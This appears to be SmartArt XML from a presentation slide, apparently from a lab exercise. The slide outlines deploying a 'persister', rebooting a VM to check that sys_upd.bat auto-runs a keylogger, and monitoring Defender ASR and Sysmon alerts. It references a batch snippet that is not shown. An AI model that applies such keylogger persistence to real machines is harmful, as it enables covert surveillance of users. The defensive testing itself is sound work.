    <dgm:cxn modelId="{FC047010-7AC3-46E5-862C-032E904F0E10}" type="presParOf" srcId="{6ED38D7C-E284-4A8B-BDB1-1493BF139704}" destId="{738C7833-0F80-4F49-9C0F-A212ADC5839A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{EDE67B72-C806-46F4-BC2B-DB1436913A02}" type="presParOf" srcId="{738C7833-0F80-4F49-9C0F-A212ADC5839A}" destId="{774462F3-C667-490E-8DB4-2DAF4D942B0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{411E832C-5A7D-46AF-B196-4AB2AC8B9666}" type="presParOf" srcId="{738C7833-0F80-4F49-9C0F-A212ADC5839A}" destId="{6C273EB4-F81B-4A70-9D96-3A7721DC2568}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{EFD3F260-227E-42B9-802E-D4FDD968DC25}" type="presParOf" srcId="{738C7833-0F80-4F49-9C0F-A212ADC5839A}" destId="{461EA02A-7C79-42F1-B8AB-F8EB91CFF3EB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{984990A2-B00B-4E2F-8D37-D92B815A3C9F}" type="presParOf" srcId="{738C7833-0F80-4F49-9C0F-A212ADC5839A}" destId="{475C7487-25A6-458F-97E7-693EDBA757FC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{43CAC6C4-3622-4B7C-8E96-84357D3ED7FC}" type="presParOf" srcId="{738C7833-0F80-4F49-9C0F-A212ADC5839A}" destId="{3B7EAFBE-4AA1-49F4-9FC6-01AD93752EA0}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F1D7CD11-B058-403C-967D-455197579611}" type="presParOf" srcId="{6ED38D7C-E284-4A8B-BDB1-1493BF139704}" destId="{48F949E6-BDD2-490A-8DE1-59AB6AAE882C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{D1BEE5DA-7AE4-4F79-96B9-68D85EBC26A5}" type="presParOf" srcId="{6ED38D7C-E284-4A8B-BDB1-1493BF139704}" destId="{AE117E10-515C-4578-9CE4-8A23652CB654}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{5A4AC148-EBE2-44DD-91A7-29E690C0ADC7}" type="presParOf" srcId="{AE117E10-515C-4578-9CE4-8A23652CB654}" destId="{DB928308-77B1-4279-8CC9-4D4857E3BF72}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{40C6C9BB-F730-453D-8D4A-110AA3792CDA}" type="presParOf" srcId="{AE117E10-515C-4578-9CE4-8A23652CB654}" destId="{30A0D542-4913-413F-80AC-EFF08AB459D6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{C5A80AF5-A540-4C0D-8A1F-6248D6E02722}" type="presParOf" srcId="{AE117E10-515C-4578-9CE4-8A23652CB654}" destId="{7BA9F12D-2699-4044-9A81-91AB9C2E889A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{849B3943-9373-49B9-9F5A-5776185C36B3}" type="presParOf" srcId="{AE117E10-515C-4578-9CE4-8A23652CB654}" destId="{48383A54-E860-4DF4-90CA-9BC1BEF56B5D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{B9997294-F26A-43BA-BC4A-8C207649CC32}" type="presParOf" srcId="{AE117E10-515C-4578-9CE4-8A23652CB654}" destId="{44FEA4E3-C168-4BBB-9E6A-D46BFF2B325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55EAA6D-D537-4A94-94C1-44D43AD2D0DA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FF941E-688F-4720-ABAD-EA4014CFB9E0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>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Deploy the Persister</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" err="1">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D6CE04E-4C54-4607-916A-E9B684989FF5}" type="parTrans" cxnId="{9BEC5A9B-46C1-4CC6-AB99-F3FFAC365B4B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-BE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D3FD5BDA-DB9F-470A-ABBC-7BEFC75A55A5}" type="sibTrans" cxnId="{9BEC5A9B-46C1-4CC6-AB99-F3FFAC365B4B}">
      <dgm:prSet phldrT="1" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03387410-F60C-41E5-A4DF-9E5C5016D99D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>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Reboot Validation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{944B233F-E578-42F2-BD0B-74A2E8DCE4D5}" type="parTrans" cxnId="{3AC1EC73-F110-4A40-8A05-608A4EE429E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-BE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B82146C-D518-4C9D-B7BC-D54FF75FA4D5}" type="sibTrans" cxnId="{3AC1EC73-F110-4A40-8A05-608A4EE429E8}">
      <dgm:prSet phldrT="2" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7242FF45-541C-4869-9518-A4351E95A74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"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Restart VM; verify sys_upd.bat auto-runs keylogger.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0027883D-3818-4A5B-805D-B0FB67DE2535}" type="parTrans" cxnId="{C55212B5-8147-4DA7-A264-1E94C7F3E901}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-BE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{371DACC4-362D-44CA-A72D-BA3E53979C31}" type="sibTrans" cxnId="{C55212B5-8147-4DA7-A264-1E94C7F3E901}">
      <dgm:prSet phldrT="3" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1687B8F2-0F22-49E0-A32F-43C969D82652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>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Monitor Defences</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50B18E71-E236-4FFD-B122-E0A5C24CA4BC}" type="parTrans" cxnId="{0ABB549A-5A88-4F79-84BA-E705BA8E2504}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-BE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08E96C85-0258-40F3-9754-5000680CB6F3}" type="sibTrans" cxnId="{0ABB549A-5A88-4F79-84BA-E705BA8E2504}">
      <dgm:prSet phldrT="3" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7731DB98-CF4C-4F75-B8FE-9B982BEDA8D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"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Check Defender ASR “Block persistence via Startup folder” alerts, Sysmon Event 11 (FileCreate).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58D1A2EC-845E-4694-AF51-CC9F0389A209}" type="parTrans" cxnId="{3B3A8DC5-92EA-4BF6-A491-0CDF180B8E80}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-BE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52BFD1C7-F2AF-477D-B634-DF94D9A15493}" type="sibTrans" cxnId="{3B3A8DC5-92EA-4BF6-A491-0CDF180B8E80}">
      <dgm:prSet phldrT="5" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33127FCB-4A29-4E09-BE64-92B0601F7FD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"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
            <a:t>Batch snippet (already in cmd_commands.bat):</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:rPr>
          </a:br>
          <a:endParaRPr lang="en-GB">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="Calibri"/>
            <a:cs typeface="Calibri"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B82D66D1-38E1-4D71-A706-6AF9E5EF070E}" type="parTrans" cxnId="{7350890C-2231-4188-83C8-04F263C5A954}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-BE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EED1DAE1-74B6-4A09-9FCC-D46F3BC35E8D}" type="sibTrans" cxnId="{7350890C-2231-4188-83C8-04F263C5A954}">
      <dgm:prSet phldrT="2" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{107F2ADA-1F9C-4847-85C1-B4E90711F0C8}" type="pres">
      <dgm:prSet presAssocID="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56D6D417-0195-47D8-906B-CCB74551E00D}" type="pres">
      <dgm:prSet presAssocID="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0413EA1C-AF21-42CE-B2D5-F56BE2D69380}" type="pres">
      <dgm:prSet presAssocID="{E7FF941E-688F-4720-ABAD-EA4014CFB9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0DBECA7-5342-4FFF-BCBD-5485E7299739}" type="pres">
      <dgm:prSet presAssocID="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B805C1A7-5357-4DA2-8F51-5B2F90E39E27}" type="pres">
      <dgm:prSet presAssocID="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE0888EA-3B91-464F-80C9-0A8F97095A9C}" type="pres">
      <dgm:prSet presAssocID="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4C3C821-1A53-496A-83DD-F13276F982FC}" type="pres">
      <dgm:prSet presAssocID="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6C924D7-3F0C-4050-B1DB-FBB89C04BC2F}" type="pres">
      <dgm:prSet presAssocID="{D3FD5BDA-DB9F-470A-ABBC-7BEFC75A55A5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25FFBA78-DFAB-4B4F-8FE5-C2CE367C0B74}" type="pres">
      <dgm:prSet presAssocID="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE44528B-84A9-4290-930D-E77705BF8132}" type="pres">
      <dgm:prSet presAssocID="{03387410-F60C-41E5-A4DF-9E5C5016D9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85F1385-884C-4766-BAEC-F9F3D1951DD2}" type="pres">
      <dgm:prSet presAssocID="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B033025E-8C4F-42C8-BD97-DC6D36F3173A}" type="pres">
      <dgm:prSet presAssocID="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4E3CA075-95BF-4FC7-9DDE-835F7431BD76}" type="pres">
      <dgm:prSet presAssocID="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BB33479-4539-47D0-BB02-6FE8B7AED7BB}" type="pres">
      <dgm:prSet presAssocID="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E5CC827D-3A68-483D-8FBE-6468FA081A8B}" type="pres">
      <dgm:prSet presAssocID="{8B82146C-D518-4C9D-B7BC-D54FF75FA4D5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B28A1EA-822C-4C30-8081-C7591D73E58E}" type="pres">
      <dgm:prSet presAssocID="{1687B8F2-0F22-49E0-A32F-43C969D82652}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8E7B12A5-75A8-4926-BF94-F7EEFBFBB4E7}" type="pres">
      <dgm:prSet presAssocID="{1687B8F2-0F22-49E0-A32F-43C969D826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B1C7C11-53AC-4ADC-99BE-D9D6E33D1D31}" type="pres">
      <dgm:prSet presAssocID="{1687B8F2-0F22-49E0-A32F-43C969D82652}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79DC9CDB-FF38-47AC-861B-1976850D87DC}" type="pres">
      <dgm:prSet presAssocID="{1687B8F2-0F22-49E0-A32F-43C969D82652}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0E82943-836D-4BBF-8BDD-8050E1CB9BD0}" type="pres">
      <dgm:prSet presAssocID="{1687B8F2-0F22-49E0-A32F-43C969D82652}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{523A164B-A7F1-430C-B297-786D8E7BD7FC}" type="pres">
      <dgm:prSet presAssocID="{1687B8F2-0F22-49E0-A32F-43C969D82652}" presName="desTx" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7350890C-2231-4188-83C8-04F263C5A954}" srcId="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" destId="{33127FCB-4A29-4E09-BE64-92B0601F7FDF}" srcOrd="0" destOrd="0" parTransId="{B82D66D1-38E1-4D71-A706-6AF9E5EF070E}" sibTransId="{EED1DAE1-74B6-4A09-9FCC-D46F3BC35E8D}"/>
    <dgm:cxn modelId="{86614821-7643-44B8-AD91-047B19C2D6A7}" type="presOf" srcId="{33127FCB-4A29-4E09-BE64-92B0601F7FDF}" destId="{C4C3C821-1A53-496A-83DD-F13276F982FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{266D042F-F3D1-4E52-8340-CCCA4C785DC0}" type="presOf" srcId="{7242FF45-541C-4869-9518-A4351E95A749}" destId="{0BB33479-4539-47D0-BB02-6FE8B7AED7BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{DC8BD745-6EE8-42BE-AE4C-614CE2336F54}" type="presOf" srcId="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" destId="{B805C1A7-5357-4DA2-8F51-5B2F90E39E27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{21205947-2347-4889-BD08-CF94C09B0242}" type="presOf" srcId="{1687B8F2-0F22-49E0-A32F-43C969D82652}" destId="{79DC9CDB-FF38-47AC-861B-1976850D87DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{3AC1EC73-F110-4A40-8A05-608A4EE429E8}" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" srcOrd="1" destOrd="0" parTransId="{944B233F-E578-42F2-BD0B-74A2E8DCE4D5}" sibTransId="{8B82146C-D518-4C9D-B7BC-D54FF75FA4D5}"/>
    <dgm:cxn modelId="{B42DAB59-2061-4C4D-BA3D-444F2E323200}" type="presOf" srcId="{7731DB98-CF4C-4F75-B8FE-9B982BEDA8D8}" destId="{523A164B-A7F1-430C-B297-786D8E7BD7FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{D109C794-53C2-4A92-828F-1FAB0ED0F53B}" type="presOf" srcId="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" destId="{B033025E-8C4F-42C8-BD97-DC6D36F3173A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{0ABB549A-5A88-4F79-84BA-E705BA8E2504}" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{1687B8F2-0F22-49E0-A32F-43C969D82652}" srcOrd="2" destOrd="0" parTransId="{50B18E71-E236-4FFD-B122-E0A5C24CA4BC}" sibTransId="{08E96C85-0258-40F3-9754-5000680CB6F3}"/>
    <dgm:cxn modelId="{9BEC5A9B-46C1-4CC6-AB99-F3FFAC365B4B}" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{E7FF941E-688F-4720-ABAD-EA4014CFB9E0}" srcOrd="0" destOrd="0" parTransId="{4D6CE04E-4C54-4607-916A-E9B684989FF5}" sibTransId="{D3FD5BDA-DB9F-470A-ABBC-7BEFC75A55A5}"/>
    <dgm:cxn modelId="{C55212B5-8147-4DA7-A264-1E94C7F3E901}" srcId="{03387410-F60C-41E5-A4DF-9E5C5016D99D}" destId="{7242FF45-541C-4869-9518-A4351E95A749}" srcOrd="0" destOrd="0" parTransId="{0027883D-3818-4A5B-805D-B0FB67DE2535}" sibTransId="{371DACC4-362D-44CA-A72D-BA3E53979C31}"/>
    <dgm:cxn modelId="{3B3A8DC5-92EA-4BF6-A491-0CDF180B8E80}" srcId="{1687B8F2-0F22-49E0-A32F-43C969D82652}" destId="{7731DB98-CF4C-4F75-B8FE-9B982BEDA8D8}" srcOrd="0" destOrd="0" parTransId="{58D1A2EC-845E-4694-AF51-CC9F0389A209}" sibTransId="{52BFD1C7-F2AF-477D-B634-DF94D9A15493}"/>
    <dgm:cxn modelId="{26FAC6DF-46C5-4C69-8A79-CD4362F566A8}" type="presOf" srcId="{655EAA6D-D537-4A94-94C1-44D43AD2D0DA}" destId="{107F2ADA-1F9C-4847-85C1-B4E90711F0C8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{4D0CBC47-6F0A-4FA1-9D0F-EAB5B26C5998}" type="presParOf" srcId="{107F2ADA-1F9C-4847-85C1-B4E90711F0C8}" destId="{56D6D417-0195-47D8-906B-CCB74551E00D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{31E8E34E-A56C-4BA1-ACE7-815B80123AA1}" type="presParOf" srcId="{56D6D417-0195-47D8-906B-CCB74551E00D}" destId="{0413EA1C-AF21-42CE-B2D5-F56BE2D69380}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{7D02E139-8FE9-4B04-B63D-2DDF0A28BC00}" type="presParOf" srcId="{56D6D417-0195-47D8-906B-CCB74551E00D}" destId="{70DBECA7-5342-4FFF-BCBD-5485E7299739}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{B05B33C4-3FA8-452B-95DF-5F9B1FD811DC}" type="presParOf" srcId="{56D6D417-0195-47D8-906B-CCB74551E00D}" destId="{B805C1A7-5357-4DA2-8F51-5B2F90E39E27}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{56D7898F-411C-4103-AC39-EDF6D7E86E33}" type="presParOf" srcId="{56D6D417-0195-47D8-906B-CCB74551E00D}" destId="{EE0888EA-3B91-464F-80C9-0A8F97095A9C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{EDE5A163-C7F6-4CAF-B431-5713028E6F02}" type="presParOf" srcId="{56D6D417-0195-47D8-906B-CCB74551E00D}" destId="{C4C3C821-1A53-496A-83DD-F13276F982FC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{16206E46-DC12-44D0-AA4C-3751C5B4D9E4}" type="presParOf" srcId="{107F2ADA-1F9C-4847-85C1-B4E90711F0C8}" destId="{D6C924D7-3F0C-4050-B1DB-FBB89C04BC2F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{63882548-2C50-470C-BD77-70C3D54C814C}" type="presParOf" srcId="{107F2ADA-1F9C-4847-85C1-B4E90711F0C8}" destId="{25FFBA78-DFAB-4B4F-8FE5-C2CE367C0B74}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{1FC8E5FF-0D12-40F9-9E18-634C8DF6B6E3}" type="presParOf" srcId="{25FFBA78-DFAB-4B4F-8FE5-C2CE367C0B74}" destId="{EE44528B-84A9-4290-930D-E77705BF8132}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{A3E95AAC-D2D8-4B27-9226-35F856A6DCD7}" type="presParOf" srcId="{25FFBA78-DFAB-4B4F-8FE5-C2CE367C0B74}" destId="{E85F1385-884C-4766-BAEC-F9F3D1951DD2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{7721FF6B-2CF9-4AA4-A04D-DF020294CE89}" type="presParOf" srcId="{25FFBA78-DFAB-4B4F-8FE5-C2CE367C0B74}" destId="{B033025E-8C4F-42C8-BD97-DC6D36F3173A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{A22E1674-201A-4823-BEB1-04048E0A439F}" type="presParOf" srcId="{25FFBA78-DFAB-4B4F-8FE5-C2CE367C0B74}" destId="{4E3CA075-95BF-4FC7-9DDE-835F7431BD76}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{A7CC50FB-1DF6-4C12-881D-9312BD7A068B}" type="presParOf" srcId="{25FFBA78-DFAB-4B4F-8FE5-C2CE367C0B74}" destId="{0BB33479-4539-47D0-BB02-6FE8B7AED7BB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{C9A369A9-D968-408A-92DE-588CCBDCF0BC}" type="presParOf" srcId="{107F2ADA-1F9C-4847-85C1-B4E90711F0C8}" destId="{E5CC827D-3A68-483D-8FBE-6468FA081A8B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{13E5CDC2-2C13-407F-B831-92806D7D1DB5}" type="presParOf" srcId="{107F2ADA-1F9C-4847-85C1-B4E90711F0C8}" destId="{3B28A1EA-822C-4C30-8081-C7591D73E58E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{A1CD148D-4483-4113-B8AF-3826CDEC4E38}" type="presParOf" srcId="{3B28A1EA-822C-4C30-8081-C7591D73E58E}" destId="{8E7B12A5-75A8-4926-BF94-F7EEFBFBB4E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{9A5E52A4-CC95-4F72-A4E0-E04035AF6765}" type="presParOf" srcId="{3B28A1EA-822C-4C30-8081-C7591D73E58E}" destId="{2B1C7C11-53AC-4ADC-99BE-D9D6E33D1D31}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{355BDCA9-97E0-42CF-BBA7-FA2170328D25}" type="presParOf" srcId="{3B28A1EA-822C-4C30-8081-C7591D73E58E}" destId="{79DC9CDB-FF38-47AC-861B-1976850D87DC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{B77F1834-17DA-4523-B93E-6F4CC544FB8E}" type="presParOf" srcId="{3B28A1EA-822C-4C30-8081-C7591D73E58E}" destId="{D0E82943-836D-4BBF-8BDD-8050E1CB9BD0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
